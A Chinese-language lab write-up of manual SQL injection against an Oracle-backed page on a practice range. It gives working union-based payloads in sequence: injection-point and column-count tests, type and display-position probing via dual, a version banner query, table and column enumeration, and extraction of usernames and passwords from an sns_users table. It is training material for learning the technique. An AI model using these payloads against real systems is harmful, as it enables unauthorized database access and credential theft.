手注Oracle墨者靶场案例

判断注入点

通过判断?id=1 and 1=1 正确 ?id=1 and 1=2 错误确定是个数字型注入点

判断列数

通过?id=1 order by 2-- 判断出存在两列数据注意Oracle闭合后面语句的是 --

判断字符类型

oracle自带虚拟表dual，oracle的查询语句必须完整的包含from字句，且每个字段的类型都要准确对应，一般使用null来判断类型。

例：?id=1 and 1=2 union select 'null','null' from dual 返回正常

and 1=2 union select 'null',null...... from dual
返回正常，说明第一个字段是数字型，反之为字符型
第一个字段是字符型，判断第二个字段类型：and 1=2 union select 'null','null'...... from dual
返回正常，说明第二个字段是字符型，反之为数字型
第一个字段是数字型，判断第二个字段类型：and 1=2 union select null,'null'...... from dual
返回正常，说明第二个字段是字符型，反之为数字型

判断显示位

?id=1 and 1=2 union select '1','2' from dual -- 上面判断出为字符型的加上单引号，即可判断出对应的显示位

探测数据库版本信息

and 1=2 union select null,(select banner
from sys.v_$version where rownum=1) from dual --

探测第一个表名

table_name表为Oracle数据库的默认表,存放所有的表名

?id=1 and 1=2 union select null,(select table_name
from user_tables where rownum=1) from dual --

第一个表名为：LOGMNR_SESSION_EVOLVE$

探测第二个表名

注意，查询第二个表时，利用筛选方法，即排除第一个表：table_name<>'LOGMNR_SESSION_EVOLVE$'

?id=1 and 1=2 union select null,(select table_name from user_tables
where rownum=1 and table_name<>'LOGMNR_SESSION_EVOLVE$') from dual --

第二个表名为：LOGMNR_GLOBAL$

该数据库名为system 因为该库下的表实在太多，一个个手注非常麻烦，所以使用sqlmap扫出该库下存在sns_user表，初步判断确定该表存放的数据是我们想要的，接下来对该表继续进行手注

探测关键表 SNS_USERS 的字段

?id=1 and 1=2 union select null,(select column_name from user_tab_columns
where table_name='sns_users' and rownum=1) from dual --

手注这条语句时发现了一个问题，当填写的表名为SNS_USERS无回显，但填写为sns_users时就有回显，说明表名区分大小写，具体是什么原因还不清楚

查询到的结果为：USER_NAME 字段

?id=1 and 1=2 union select null,(select column_name from user_tab_columns
where table_name='sns_users' and rownum=1 and column_name<>'USER_NAME') from dual --
排除查询到的第一个字段，继续向下查该表的剩余字段

查询到的结果为：USER_PWD 字段

正常查询出现的用户名和密码都是假数据，不过发现了还有一个STATUS字段，通过where它获取到了真正的数据！

探测关键字段的数据

and 1=2 union select USER_NAME,USER_PWD from "sns_users" where STATUS=1  --
注意此刻的表名要用双引号包起来